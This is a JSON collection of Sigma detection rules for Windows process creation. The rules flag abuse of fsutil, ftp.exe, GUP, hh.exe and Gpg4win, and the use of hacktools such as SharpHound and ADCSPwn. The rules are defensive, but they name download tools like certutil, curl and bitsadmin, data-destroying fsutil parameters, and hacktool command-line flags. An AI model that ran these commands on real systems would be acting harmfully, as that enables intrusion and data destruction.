    "content": "title: Potentially Suspicious NTFS Symlink Behavior Modification\nid: c0b2768a-dd06-4671-8339-b16ca8d1f27f\nstatus: test\ndescription: |\n    Detects the modification of NTFS symbolic link behavior using fsutil, which could be used to enable remote to local or remote to remote symlinks for potential attacks.\nreferences:\n    - https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware\n    - https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior\n    - https://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/\nauthor: frack113, The DFIR Report\ndate: 2022-03-02\nmodified: 2025-11-13\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.t1222.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img_proxy:\n        # Note: Example command observed:  cmd.exe /c \"fsutil behaviour set SymlinkEvaluation\"\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_fsutil_cli:\n        CommandLine|contains|all:\n            - 'fsutil'\n            - 'behavior'\n            - 'set'\n            - 'SymlinkEvaluation'\n    selection_symlink_params:\n        CommandLine|contains:\n            - 'R2L:1' # Remote to Local\n            - 'R2R:1' # Remote to Remote\n            - 'L2L:1' # Local to Local\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage, investigate the parent process and context to determine if benign.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_fsutil_usage.yml",
    "content": "title: Fsutil Suspicious Invocation\nid: add64136-62e5-48ea-807e-88638d02df1e\nstatus: stable\ndescription: |\n  Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\n  Might be used by ransomwares during the attack (seen by NotPetya and others).\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html\n    - https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md\n    - https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt\nauthor: Ecco, E.M. Anhaus, oscd.community\ndate: 2019-09-26\nmodified: 2023-09-09\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1070\n    - attack.t1485\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\fsutil.exe'\n        - OriginalFileName: 'fsutil.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'deletejournal'        # usn deletejournal ==> generally ransomware or attacker\n            - 'createjournal'        # usn createjournal ==> can modify config to set it to a tiny size\n            - 'setZeroData'          # file setZeroData  ==> empties a file with zeroes\n    condition: all of selection_*\nfalsepositives:\n    - Admin activity\n    - Scripts and administrative tools used in the monitored environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ftp_arbitrary_command_execution.yml",
    "content": "title: Potential Arbitrary Command Execution Via FTP.EXE\nid: 06b401f4-107c-4ff9-947f-9ec1e7649f1e\nstatus: test\ndescription: Detects execution of \"ftp.exe\" script with the \"-s\" or \"/s\" flag and any child processes ran by \"ftp.exe\".\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ftp/\nauthor: Victor Sergeev, oscd.community\ndate: 2020-10-09\nmodified: 2024-04-23\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\ftp.exe'\n    selection_child_img:\n        - Image|endswith: '\\ftp.exe'\n        - OriginalFileName: 'ftp.exe'\n    selection_child_cli:\n        CommandLine|contains|windash: '-s:'\n    condition: selection_parent or all of selection_child_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml",
    "content": "title: Arbitrary File Download Via GfxDownloadWrapper.EXE\nid: eee00933-a761-4cd0-be70-c42fe91731e7\nstatus: test\ndescription: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.\nreferences:\n    - https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/\nauthor: Victor Sergeev, oscd.community\ndate: 2020-10-09\nmodified: 2023-10-18\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\GfxDownloadWrapper.exe'\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n    filter_main_known_urls:\n        CommandLine|contains: 'https://gameplayapi.intel.com/'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_git_susp_clone.yml",
    "content": "title: Suspicious Git Clone\nid: aef9d1f1-7396-4e92-a927-4567c7a495c1\nstatus: test\ndescription: Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious\nreferences:\n    - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-03\nmodified: 2023-01-10\ntags:\n    - attack.reconnaissance\n    - attack.t1593.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\git.exe'\n              - '\\git-remote-https.exe'\n        - OriginalFileName: 'git.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' clone '\n            - 'git-remote-https '\n    selection_keyword:\n        CommandLine|contains:\n            # Add more suspicious keywords\n            - 'exploit'\n            - 'Vulns'\n            - 'vulnerability'\n            - 'RemoteCodeExecution'\n            - 'Invoke-'\n            - 'CVE-'\n            - 'poc-'\n            - 'ProofOfConcept'\n            # Add more vuln names\n            - 'proxyshell'\n            - 'log4shell'\n            - 'eternalblue'\n            - 'eternal-blue'\n            - 'MS17-'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_github_self_hosted_runner.yml",
    "content": "title: Github Self-Hosted Runner Execution\nid: 5bac7a56-da88-4c27-922e-c81e113b20cb\nstatus: test\ndescription: |\n    Detects GitHub self-hosted runners executing workflows on local infrastructure that could be abused for persistence and code execution.\n    Shai-Hulud is an npm supply chain worm targeting CI/CD environments.\n    It installs runners on compromised systems to maintain access after credential theft, leveraging their access to secrets and internal networks.\nreferences:\n    - https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/\n    - https://securitylabs.datadoghq.com/articles/shai-hulud-2.0-npm-worm/\nauthor: Daniel Koifman (KoifSec)\ndate: 2025-11-29\ntags:\n    - attack.command-and-control\n    - attack.t1102.002\n    - attack.t1071\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_worker_img:  # Example command C:\\Users\\Lab\\actions-runner\\bin\\Runner.Worker.exe spawnclient 1288 1252\n        - Image|endswith: '\\Runner.Worker.exe'\n        - OriginalFileName: 'Runner.Worker.dll'\n    selection_worker_cli:\n        CommandLine|contains: 'spawnclient'\n    selection_listener_img: # Example command C:\\Users\\Lab\\actions-runner\\bin\\Runner.Listener.exe  configure --url https://github.com/ABC/ABC --token 123123\n        - Image|endswith: '\\Runner.Listener.exe'\n        - OriginalFileName: 'Runner.Listener.dll'\n    selection_listener_cli:\n        CommandLine|contains:\n            - 'run'\n            - 'configure'\n    condition: all of selection_worker_* or all of selection_listener_*\nfalsepositives:\n    - Legitimate GitHub self-hosted runner installations on designated CI/CD infrastructure\n    - Authorized runner deployments by DevOps/Platform teams following change management\n    - Scheduled runner updates or reconfigurations on existing build agents\n    - Self-hosted runners that follow expected/known naming patterns\n    - Installation via expected/known configuration management tools (reflected mostly as parent process name)\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_github_self_hosted_runner/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_googleupdate_susp_child_process.yml",
    "content": "title: Potentially Suspicious GoogleUpdate Child Process\nid: 84b1ecf9-6eff-4004-bafb-bae5c0e251b2\nrelated:\n    - id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc\n      type: derived\nstatus: test\ndescription: Detects potentially suspicious child processes of \"GoogleUpdate.exe\"\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\nmodified: 2023-05-22\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\GoogleUpdate.exe'\n    filter_main_known_legit:\n        # Some other legit child process might exist. It's better to make a baseline before running this in production\n        - Image|contains: '\\Google' # Example: GoogleUpdate.exe, GoogleCrashHandler.exe, GoogleUpdateComRegisterShell64.exe\n        - Image|endswith:\n              - '\\setup.exe'\n              - 'chrome_updater.exe'\n              - 'chrome_installer.exe'\n    filter_main_image_null:\n        Image: null\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gpg4win_decryption.yml",
    "content": "title: File Decryption Using Gpg4win\nid: 037dcd71-33a8-4392-bb01-293c94663e5a\nstatus: test\ndescription: Detects usage of Gpg4win to decrypt files\nreferences:\n    - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\n    - https://www.gpg4win.de/documentation.html\n    - https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-09\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_metadata:\n        - Image|endswith:\n              - '\\gpg.exe'\n              - '\\gpg2.exe'\n        - Description: 'GnuPG’s OpenPGP tool'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' -d '\n            - 'passphrase'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gpg4win_encryption.yml",
    "content": "title: File Encryption Using Gpg4win\nid: 550bbb84-ce5d-4e61-84ad-e590f0024dcd\nstatus: test\ndescription: Detects usage of Gpg4win to encrypt files\nreferences:\n    - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\n    - https://www.gpg4win.de/documentation.html\n    - https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-09\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_metadata:\n        - Image|endswith:\n              - '\\gpg.exe'\n              - '\\gpg2.exe'\n        - Description: 'GnuPG’s OpenPGP tool'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' -c '\n            - 'passphrase'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gpg4win_portable_execution.yml",
    "content": "title: Portable Gpg.EXE Execution\nid: 77df53a5-1d78-4f32-bc5a-0e7465bd8f41\nstatus: test\ndescription: Detects the execution of \"gpg.exe\" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.\nreferences:\n    - https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a\n    - https://securelist.com/locked-out/68960/\n    - https://github.com/redcanaryco/atomic-red-team/blob/c4097dc7ed14d7f7d08c89d148c4307097e8c294/atomics/T1486/T1486.md\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-06\nmodified: 2023-11-10\ntags:\n    - attack.impact\n    - attack.t1486\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\gpg.exe'\n              - '\\gpg2.exe'\n        - OriginalFileName: 'gpg.exe'\n        - Description: 'GnuPG’s OpenPGP tool'\n    filter_main_legit_location:\n        Image|contains:\n            - ':\\Program Files (x86)\\GNU\\GnuPG\\bin\\'\n            - ':\\Program Files (x86)\\GnuPG VS-Desktop\\'\n            - ':\\Program Files (x86)\\GnuPG\\bin\\'\n            - ':\\Program Files (x86)\\Gpg4win\\bin\\'\n    condition: selection and not 1 of filter_main_*\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gpg4win_susp_location.yml",
    "content": "title: File Encryption/Decryption Via Gpg4win From Suspicious Locations\nid: e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d\nstatus: test\ndescription: Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.\nreferences:\n    - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\n    - https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2022-11-30\nmodified: 2023-08-09\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_metadata:\n        - Image|endswith:\n              - '\\gpg.exe'\n              - '\\gpg2.exe'\n        - Product: 'GNU Privacy Guard (GnuPG)'\n        - Description: 'GnuPG’s OpenPGP tool'\n    selection_cli:\n        CommandLine|contains: '-passphrase'\n    selection_paths:\n        CommandLine|contains:\n            - ':\\PerfLogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gpresult_execution.yml",
    "content": "title: Gpresult Display Group Policy Information\nid: e56d3073-83ff-4021-90fe-c658e0709e72\nstatus: test\ndescription: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult\n    - https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\n    - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf\nauthor: frack113\ndate: 2022-05-01\ntags:\n    - attack.discovery\n    - attack.t1615\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '\\gpresult.exe'\n        CommandLine|contains:\n            - '/z'\n            - '/v'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nsimulation:\n    - type: atomic-red-team\n      name: Display group policy information via gpresult\n      technique: T1615\n      atomic_guid: 0976990f-53b1-4d3f-a185-6df5be429d3b\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_gpresult_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml",
    "content": "title: Arbitrary Binary Execution Using GUP Utility\nid: d65aee4d-2292-4cea-b832-83accd6cfa43\nstatus: test\ndescription: Detects execution of the Notepad++ updater (gup) to launch other commands or executables\nreferences:\n    - https://twitter.com/nas_bench/status/1535322445439180803\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-10\nmodified: 2023-03-02\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\gup.exe'\n        Image|endswith: '\\explorer.exe'\n    filter:\n        Image|endswith: '\\explorer.exe'\n        CommandLine|contains: '\\Notepad++\\notepad++.exe'\n    filter_parent:\n        ParentImage|contains: '\\Notepad++\\updater\\'\n    filter_null:\n        CommandLine: null\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Other parent binaries using GUP not currently identified\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gup_download.yml",
    "content": "title: File Download Using Notepad++ GUP Utility\nid: 44143844-0631-49ab-97a0-96387d6b2d7c\nstatus: test\ndescription: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.\nreferences:\n    - https://twitter.com/nas_bench/status/1535322182863179776\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-10\nmodified: 2023-03-02\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\GUP.exe'\n        - OriginalFileName: 'gup.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' -unzipTo '\n            - 'http'\n    filter:\n        ParentImage|endswith: '\\notepad++.exe'\n    condition: all of selection* and not filter\nfalsepositives:\n    - Other parent processes other than notepad++ using GUP that are not currently identified\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gup_susp_child_process.yml",
    "content": "title: Suspicious Child Process of Notepad++ Updater - GUP.Exe\nid: bb0e87ce-c89f-4857-84fa-095e4483e9cb\nstatus: experimental\ndescription: |\n    Detects suspicious child process creation by the Notepad++ updater process (gup.exe).\n    This could indicate potential exploitation of the updater component to deliver unwanted malware.\nreferences:\n    - https://notepad-plus-plus.org/news/v889-released/\n    - https://www.heise.de/en/news/Notepad-updater-installed-malware-11109726.html\n    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/\n    - https://www.validin.com/blog/exploring_notepad_plus_plus_network_indicators/\n    - https://securelist.com/notepad-supply-chain-attack/118708/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-02-03\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1195.002\n    - attack.initial-access\n    - attack.t1557\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\gup.exe'\n    selection_child_img:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n            - '\\mshta.exe'\n    selection_child_cli:\n        CommandLine|contains:\n            - 'bitsadmin'\n            - 'certutil'\n            - 'curl'\n            - 'finger'\n            - 'forfiles'\n            - 'regsvr32'\n            - 'rundll32'\n            - 'wget'\n    condition: selection_parent and 1 of selection_child_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gup_suspicious_execution.yml",
    "content": "title: Suspicious GUP Usage\nid: 0a4f6091-223b-41f6-8743-f322ec84930b\nstatus: test\ndescription: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-02-06\nmodified: 2022-08-13\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\GUP.exe'\n    filter_programfiles:\n        Image|endswith:\n            - '\\Program Files\\Notepad++\\updater\\GUP.exe'\n            - '\\Program Files (x86)\\Notepad++\\updater\\GUP.exe'\n    filter_user:\n        Image|contains: '\\Users\\'\n        Image|endswith:\n            - '\\AppData\\Local\\Notepad++\\updater\\GUP.exe'\n            - '\\AppData\\Roaming\\Notepad++\\updater\\GUP.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Execution of tools named GUP.exe and located in folders different than Notepad++\\updater\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml",
    "content": "title: HH.EXE Execution\nid: 68c8acb4-1b60-4890-8e82-3ddf7a6dba84\nstatus: test\ndescription: Detects the execution of \"hh.exe\" to open \".chm\" files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html\n    - https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community\ndate: 2019-10-24\nmodified: 2023-12-11\ntags:\n    - attack.defense-evasion\n    - attack.t1218.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'HH.exe'\n        - Image|endswith: '\\hh.exe'\n    selection_cli:\n        CommandLine|contains: '.chm'\n    condition: all of selection_*\nfalsepositives:\n    - False positives are expected with legitimate \".CHM\"\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml",
    "content": "title: Remote CHM File Download/Execution Via HH.EXE\nid: f57c58b3-ee69-4ef5-9041-455bf39aaa89\nstatus: test\ndescription: Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.\nreferences:\n    - https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md\n    - https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-29\nmodified: 2024-01-31\ntags:\n    - attack.defense-evasion\n    - attack.t1218.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'HH.exe'\n        - Image|endswith: '\\hh.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n            - '\\\\\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml",
    "content": "title: HTML Help HH.EXE Suspicious Child Process\nid: 52cad028-0ff0-4854-8f67-d25dfcbc78b4\nstatus: test\ndescription: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)\nreferences:\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7\n    - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/\n    - https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37\nauthor: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-04-01\nmodified: 2023-04-12\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.initial-access\n    - attack.t1047\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.t1059.005\n    - attack.t1059.007\n    - attack.t1218\n    - attack.t1218.001\n    - attack.t1218.010\n    - attack.t1218.011\n    - attack.t1566\n    - attack.t1566.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\hh.exe'\n        Image|endswith:\n            - '\\CertReq.exe'\n            - '\\CertUtil.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\installutil.exe'\n            - '\\MSbuild.exe'\n            - '\\MSHTA.EXE'\n            - '\\msiexec.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\schtasks.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hh_susp_execution.yml",
    "content": "title: Suspicious HH.EXE Execution\nid: e8a95b5e-c891-46e2-b33a-93937d3abc31\nstatus: test\ndescription: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)\nreferences:\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7\n    - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/\n    - https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37\nauthor: Maxim Pavlunin\ndate: 2020-04-01\nmodified: 2023-04-12\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.initial-access\n    - attack.t1047\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.t1059.005\n    - attack.t1059.007\n    - attack.t1218\n    - attack.t1218.001\n    - attack.t1218.010\n    - attack.t1218.011\n    - attack.t1566\n    - attack.t1566.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'HH.exe'\n        - Image|endswith: '\\hh.exe'\n    selection_paths:\n        CommandLine|contains:\n            - '.application'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Content.Outlook\\'\n            - '\\Downloads\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            # - '\\AppData\\Local\\Temp\\Temp?_'\n            # - '\\AppData\\Local\\Temp\\Rar$'\n            # - '\\AppData\\Local\\Temp\\7z'\n            # - '\\AppData\\Local\\Temp\\wz'\n            # - '\\AppData\\Local\\Temp\\peazip-tmp'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_adcspwn.yml",
    "content": "title: HackTool - ADCSPwn Execution\nid: cd8c163e-a19b-402e-bdd5-419ff5859f12\nstatus: test\ndescription: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service\nreferences:\n    - https://github.com/bats3c/ADCSPwn\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-31\nmodified: 2023-02-04\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1557.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - ' --adcs '\n            - ' --port '\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml",
    "content": "title: HackTool - Bloodhound/Sharphound Execution\nid: f376c8a7-a2d0-4ddc-aa0c-16c17236d962\nstatus: test\ndescription: Detects command line parameters used by Bloodhound and Sharphound hack tools\nreferences:\n    - https://github.com/BloodHoundAD/BloodHound\n    - https://github.com/BloodHoundAD/SharpHound\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-12-20\nmodified: 2023-02-04\ntags:\n    - attack.discovery\n    - attack.t1087.001\n    - attack.t1087.002\n    - attack.t1482\n    - attack.t1069.001\n    - attack.t1069.002\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Product|contains: 'SharpHound'\n        - Description|contains: 'SharpHound'\n        - Company|contains:\n              - 'SpecterOps'\n              - 'evil corp'\n        - Image|contains:\n              - '\\Bloodhound.exe'\n              - '\\SharpHound.exe'\n    selection_cli_1:\n        CommandLine|contains:\n            - ' -CollectionMethod All '\n            - ' --CollectionMethods Session '\n            - ' --Loop --Loopduration '\n            - ' --PortScanTimeout '\n            - '.exe -c All -d '\n            - 'Invoke-Bloodhound'\n            - 'Get-BloodHoundData'\n    selection_cli_2:\n        CommandLine|contains|all:\n            - ' -JsonFolder '\n            - ' -ZipFileName '\n    selection_cli_3:\n        CommandLine|contains|all:\n            - ' DCOnly '\n            - ' --NoSaveCache '\n    condition: 1 of selection_*\nfalsepositives:\n    - Other programs that use these command line option and accepts an 'All' parameter\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml",
    "content": "title: HackTool - F-Secure C3 Load by Rundll32\nid: b18c9d4c-fac9-4708-bd06-dd5bfacf200f\nstatus: test\ndescription: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.\nreferences:\n    - https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12\nauthor: Alfie Champion (ajpc500)\ndate: 2021-06-02\nmodified: 2023-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'rundll32.exe'\n            - '.dll'\n            - 'StartNodeRelay'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
